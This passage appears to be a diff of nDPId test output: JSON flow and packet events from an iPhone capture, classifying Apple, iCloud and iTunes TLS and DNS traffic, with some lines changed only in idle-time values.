{"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454599585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599585,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAACsGFVcRiaYjwKgCEQG7xZn\/hRwvvYfesqBS\/\/9NtwAAAgQFrAQCCArKEDlZEd\/rCQEDAws="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1582454599602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599602,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGwF7AqAIREYmmI8WZAbu9h96y\/4UcMIAQBAt3qQAAAQEIChHf7BTKEDlZ"} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599740,"flow_last_seen":1582454599740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599740,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454599740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599740,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WaAbsCzUbDAAAAALDC\/\/+ibQAAAgQFtAEDAwcBAQgKEd\/sCwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454599774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599774,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC0GCMAR+LBLwKgCEQG7xZq3FAeKAs1GxKBScSAgIAAAAgQFrAEBCApbEwv6Ed\/sCwEDAwU="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454599776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WaAbsCzUbEtxQHi4AQBAu4qgAAAQEIChHf7JdbEwv6"} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01232{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"thread_ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}} 
+00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454599929,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454599929,"pkt":"xiwDYGpkxGGLNYKpCABFAABDumIAAP8Re+TAqAIRwKgCAf43ADUALyJV0zQBAAABAAAAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} 
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454599930,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1582454599930,"pkt":"xGGLNYKpxiwDYGpkCABFAADjtQsAAEARP5zAqAIBwKgCEQA1\/jcAz3eX0zSBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMOwAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOmACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXgAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAOAARce00awJMAAQABAAAADgAEXHtNQA=="} 
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454599930,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599934,"flow_last_seen":1582454599934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454599934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599934,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGzmnAqAIRXHtNGsWbAbupO4D5AAAAALDC\/\/\/ZMQAAAgQFtAEDAwcBAQgKEd\/tTwAAAAAEAgAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454599967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599967,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGGW5ce00awKgCEQG7xZtUZWomqTuA+qBScSDQrwAAAgQFrAQCCAozMbcgEd\/tTwEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454600080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600080,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGznXAqAIRXHtNGsWbAbupO4D6VGVqJ4AQBAtsOAAAAQEIChHf7eAzMbcg"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599934,"flow_last_seen":1582454599934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454599934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599934,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGzmnAqAIRXHtNGsWbAbupO4D5AAAAALDC\/\/\/ZMQAAAgQFtAEDAwcBAQgKEd\/tTwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454599967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599967,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGGW5ce00awKgCEQG7xZtUZWomqTuA+qBScSDQrwAAAgQFrAQCCAozMbcgEd\/tTwEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454600080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600080,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGznXAqAIRXHtNGsWbAbupO4D6VGVqJ4AQBAtsOAAAAQEIChHf7eAzMbcg"} 
+00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454600454,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454600454,"pkt":"xiwDYGpkxGGLNYKpCABFAABDtJ8AAP8RgafAqAIRwKgCAfi9ADUAL+BtI4YBAAABAAAAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454600494,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1582454600494,"pkt":"xGGLNYKpxiwDYGpkCABFAADQcdgAAEARguLAqAIBwKgCEQA1+L0AvB7yI4aBgAABAAQAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAF1gAmCHN5bmMtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAWqABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAYAARfZRg1"} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600494,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 
